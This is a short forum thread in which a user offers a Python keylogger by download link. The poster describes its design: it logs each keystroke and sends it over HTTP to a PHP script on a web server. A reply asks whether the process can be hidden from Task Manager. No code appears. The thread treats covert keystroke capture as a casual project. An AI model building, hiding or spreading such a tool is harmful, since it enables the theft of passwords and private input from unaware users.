Keylogger in Python

Questions about programming languages and debugging
Post Reply
User avatar
maboroshi
Dr. Mab
Dr. Mab
Posts: 1624
Joined: 28 Aug 2005, 16:00
18

Keylogger in Python

Post by maboroshi »

here is simple keylogger that sends the data to a web server

www.techshinobi.de/software/mylog.zip

written by Maboroshi

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Post by bad_brain »

sweet! :D
I'll try it later... 8)
can the process be found by taskmanager?

User avatar
maboroshi
Dr. Mab
Dr. Mab
Posts: 1624
Joined: 28 Aug 2005, 16:00
18

Of Course

Post by maboroshi »

Ya I believe you can Im sure some one could fix that though. I will explain how it works

4 Files:

1 empty txt file
2 PHP files - 1 for writing to the txt file one for reading
1 python file The Keylogger

The Python file runs on the machine you wish to record keys on for each key pressed it sends the info through HTTP on Port 80 to the php file for writing

And thats it there are many things you can do to improve on it Im sure.

the logger itself was written in less than 30 lines of code :)

Post Reply